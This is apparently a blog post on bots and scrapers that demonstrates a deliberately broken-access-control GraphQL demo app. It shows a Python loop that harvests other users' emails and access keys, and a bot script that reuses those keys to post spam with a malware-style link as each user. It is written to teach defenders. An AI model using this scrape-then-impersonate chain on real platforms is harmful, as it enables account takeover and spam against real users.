Bots and Scrapers: Motivations, Tactics, and Defenses

scraping November 16, 2024 Long read

Bots and scrapers, a quick intro

Bots and scrapers play a much bigger role online than most people realize. some of them keep the web running smoothly, others cause real problems for platforms and the people using them. I wanted to walk through what they actually do, why they exist, and what you can do to understand them and defend against them, mostly so the writeup I would have wanted years ago is out there. This is just me sharing what I have picked up along the way.

Understanding bots and scrapers

Bots are automated programs that interact with websites or applications. Some of them perform helpful tasks and take work off our hands. Others pretend to be real people or use automation in ways that create problems. Scrapers focus on collecting information by pulling data from a site piece by piece. Sometimes this is done for legitimate reasons. Other times it is used to gather large amounts of data without permission or control.

Many bots are designed to copy human behavior closely enough to blend in, making them difficult to spot. Scrapers tend to be quieter but persistent, slowly gathering the information they are after. While their goals differ, both rely on finding weak points in systems, and that is where the trouble usually begins.

Motives and tactics

The reasons behind bot activity vary widely. Some bots spread unwanted messages or try to influence how people think. Others aim to trick users, gather sensitive information, or take advantage of system features. Scrapers often collect data for research, monitoring, or analysis. But they can also be used for large scale data harvesting, copying entire profiles or sets of content.

The tactics used by both are constantly evolving. Bots may rotate user agents or IP addresses to avoid detection. Scrapers may carefully time their requests to stay under rate limits. When these two tools work together, they can create an even larger impact than either would on its own.

Combining forces for greater impact

One of the more concerning situations is when bots and scrapers support each other. For example, a scraper might collect user data and pass it to a bot that then spreads messages pretending to be real people. This type of pairing can mislead users, damage trust, and weaken the overall safety of a platform. When left unchecked, it becomes difficult to know what is genuine and what is part of a coordinated effort.

A generic social media app

To help demonstrate how these issues can appear in real systems, I created a simple GraphQL-based application that mimics a small social media platform. It generates sample users, posts, and interactions. The point of the exercise is to show where things can go wrong and how vulnerabilities can appear in ways that may not be obvious at first glance.

# [truncated]
def validate_access_key(access_key):
    return access_key == "valid_access_key"
# [truncated]

This function checks if the incoming request provided a matching access key. It is intentionally simple for demonstration purposes.

# [truncated]
access_key = info.context.get('access_key')
if access_key != self.access_key:
    raise Exception("Access denied")
# [truncated]

Each resolver checks the provided key before returning data. In a real application you would obviously want stronger checks than this, but for the demo it shows how easily things can break if the checks are skipped or applied inconsistently.

In this example, user 8 corresponds to James Martinez, which we can see by running a simple GraphQL query.

Request

curl -X POST -H "Content-Type: application/json" \
     -H "Access-Key: 50441f01-8b54-4ea1-a0c1-88c02dd97bc0" \
     --data '{"query": "{ user(id: 8) { id name } }"}' \
     http://localhost:5000/graphql

Response

{
  "data": {
    "user": {
      "id": "VXNlcjo4",
      "name": "James Martinez"
    }
  }
}

If the same user tries to view another user's private information, the system correctly denies access. This is what we expect and want to see.

Request

curl -X POST -H "Content-Type: application/json" \
     -H "Access-Key: 50441f01-8b54-4ea1-a0c1-88c02dd97bc0" \
     --data '{"query": "{ user(id: 9) { id name email posts (limit:2) { id title content } } }"}' \
     http://localhost:5000/graphql

Response

{
  "data": { "user": null },
  "errors": [
    { "message": "Access denied: Invalid access key", "path": ["user"] }
  ]
}

Now that we understand the intended behavior, we can look at the vulnerable portions of the application. These were added on purpose to show how easily a small oversight can create an opening.

The issues appear in the resolve_posts and resolve_user methods within the User class. Here is a portion of the code:

# [truncated]
def resolve_posts(self, info, limit=None):
    session = info.context.get('session')
    query = session.query(PostModel).filter_by(user_id=self.id)
    if limit is not None:
        query = query.limit(limit)
    return query.all()
# [truncated]
def resolve_user(self, info, id):
    access_key = info.context.get('access_key')
# [truncated]

The key check is missing here. Because of that, any user can request another user's posts, comments, or profile data. That is exactly what a scraper looks for, especially if the goal is to collect as much data as possible while pretending to be different users.

If we repeat the earlier request, the server now returns user 9's information without complaint. With the access-control gap in place, the response includes name, email, and posts for the targeted user. That is exactly the kind of oversight scrapers thrive on. With this opening it becomes very easy to gather information in bulk, especially if combined with automation.

From here, it is not difficult to imagine a scraper gathering access keys and turning them over to a bot that then spreads unwanted content by posting as real users.

# [truncated]
def send_request(user_id, lock, responses):
    graphql_query = {"query": "{ user(id: %d) { id name email accessKey } }" % user_id}
    headers = {
        "Content-Type": "application/json",
        "Access-Key": access_key,
    }
    response = requests.post(graphql_url, json=graphql_query, headers=headers)
    if response.status_code == 200 and response.json().get("data"):
# [truncated]

Below is a sample of the output from a simple scraping loop that gathers user data. This is the kind of information a bot can later misuse.

Scrape output

Response for user ID 1:
{"data": {"user": {"accessKey": "97c9ea8c-...", "email": "[email protected]", "name": "John Doe"}}}
Response for user ID 2:
{"data": {"user": {"accessKey": "f4a67797-...", "email": "[email protected]", "name": "Jane Smith"}}}
Response for user ID 3:
{"data": {"user": {"accessKey": "27a8b14e-...", "email": "[email protected]", "name": "Alice Johnson"}}}
...
[truncated]

Using the gathered keys, a bot can now post messages as if it were the real user, which is a real concern for any platform.

access_keys = ["50441f01-...", "27a8b14e-...", "59d73e34-...", ...]

def send_request(access_key):
    mutation_query = '''
    mutation {
      createPost(title: "Bot Post by James",
                 content: "Check out this totally safe link!! www.thisismalware.com") {
        post { id }
      }
    }
    '''
    # ... send with access_key in headers ...
    print(f"key:{access_key} post successful | id:{post_id}")

The bot script cycles through each access key and posts as the user tied to that key. This is how a simple oversight can quickly spiral into something much larger in a real-world environment.

key:c6790640-... post successful | id:UG9zdDo1MQ==
key:59d73e34-... post successful | id:UG9zdDo1Mw==
key:8968c9e0-... post successful | id:UG9zdDo1Mg==
key:f4a67797-... post successful | id:UG9zdDo1NA==
key:50441f01-... post successful | id:UG9zdDo1NQ==
...

Querying those posts shows the bot activity clearly. It has posted as multiple users and each post carries the same message — a textbook spam-by-impersonation pattern, surfacing from the same scrape-then-replay pipeline.

This entire example is meant to show how small gaps in logic can grow into real issues. Even simple oversights can make it far too easy for bots and scrapers to abuse a system. The more we understand how they work, the better equipped we are to recognize warning signs and strengthen the systems we build.

Working toward better defenses

Keeping bots and scrapers in check requires continuous attention and patience. Good access control, proper rate limiting, careful validation, and regular code reviews all play an important role. Monitoring patterns and user behavior can also help catch unusual activity before it grows too large. It will always be a balancing act, but staying aware and adapting as tactics evolve is key.

I hope this breakdown offered some helpful insight. The more we share what we learn, the stronger our collective defenses become.

Want to explore the code and try it out yourself? Visit the generic_socialMedia repo on GitHub.

Bots and scrapers, a quick intro

Understanding bots and scrapers

Motives and tactics

Combining forces for greater impact

A generic social media app

Request

Response

Request

Response

Scrape output

Working toward better defenses

Liked this?